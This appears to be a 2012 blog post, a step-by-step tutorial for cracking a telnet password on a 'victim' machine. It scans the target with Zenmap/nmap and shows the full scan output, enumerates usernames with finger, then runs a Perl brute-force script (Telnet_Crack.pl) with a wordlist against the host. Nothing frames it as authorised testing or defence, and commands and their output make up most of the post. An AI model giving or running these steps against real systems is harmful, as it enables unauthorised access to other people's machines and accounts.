PoiNtEr->: Crack Telnet Password Using Brute Force

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.

Search This Blog

Tuesday, April 10, 2012

Crack Telnet Password Using Brute Force





First Install Zenmap on your ubuntu machine:
sudo apt-get install zenmap

Now open your terminal and use following command to check open ports on victim's system
nmapfe
now in gui prompt put the ip address of victim in target box.

Output(sample):

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-11 07:20 IST
NSE: Loaded 36 scripts for scanning.
Initiating ARP Ping Scan at 07:20
Scanning 192.168.2.10 [1 port]
Completed ARP Ping Scan at 07:20, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:20
Completed Parallel DNS resolution of 1 host. at 07:20, 0.09s elapsed
Initiating SYN Stealth Scan at 07:20
Scanning 192.168.2.10 [1000 ports]
Discovered open port 445/tcp on 192.168.2.10
Discovered open port 80/tcp on 192.168.2.10
Discovered open port 23/tcp on 192.168.2.10
Discovered open port 139/tcp on 192.168.2.10
Completed SYN Stealth Scan at 07:20, 2.70s elapsed (1000 total ports)
Initiating Service scan at 07:20
Scanning 4 services on 192.168.2.10
Completed Service scan at 07:20, 11.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.2.10
Retrying OS detection (try #2) against 192.168.2.10
Retrying OS detection (try #3) against 192.168.2.10
Retrying OS detection (try #4) against 192.168.2.10
Retrying OS detection (try #5) against 192.168.2.10
NSE: Script scanning 192.168.2.10.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 07:21
Completed NSE at 07:21, 0.08s elapsed
NSE: Script Scanning completed.
Nmap scan report for 192.168.2.10
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
23/tcp  open  telnet      Linux telnetd
80/tcp  open  http        Apache httpd 2.2.17 ((Ubuntu))
|_html-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:24:2B:DB:74:9F (Hon Hai Precision Ind.Co.)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.21%D=4/11%OT=23%CT=1%CU=35230%PV=Y%DS=1%DC=D%G=Y%M=00242B%TM=4F
OS:84E390%P=i686-pc-linux-gnu)SEQ(SP=CA%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST
OS:11NW6%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)EC
OS:N(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M5B4ST11NW6%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)


Uptime guess: 0.011 days (since Wed Apr 11 07:05:17 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux


Host script results:
| nbstat:  
|   NetBIOS name: UMESH-VOSTRO151, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UMESH-VOSTRO151<00>  Flags: <unique><active>
|     UMESH-VOSTRO151<03>  Flags: <unique><active>
|     UMESH-VOSTRO151<20>  Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|_    WORKGROUP<00>        Flags: <group><active>
| smb-os-discovery:  
|   OS: Unix (Samba 3.5.8)
|   Name: Unknown\Unknown
|_  System time: 2012-04-11 07:21:12 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol


HOP RTT     ADDRESS
1   2.10 ms 192.168.2.10


Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.00 seconds
           Raw packets sent: 1134 (53.704KB) | Rcvd: 1076 (46.608KB)



Now Download following files and extract them:

Open a new Terminal and browse to extracted files and put following command in it:
To get the username use:
finger@ 192.168.2.10 (ipaddress of victim)
output:
umesh root

Now To brute-force run perl script with given parameters.
perl Telnet_Crack.pl -h 192.168.2.10 -u umesh -P polish

output:
TRYING : USERNAME = XXXX PASSWORD = password

ATTEMPTING CONNECTION TO 192.168.2.10.

OK ... CONNECTED!!!



it will take time and it depends on the strength of password that how long you have to wait to get the result.

No comments:

Post a Comment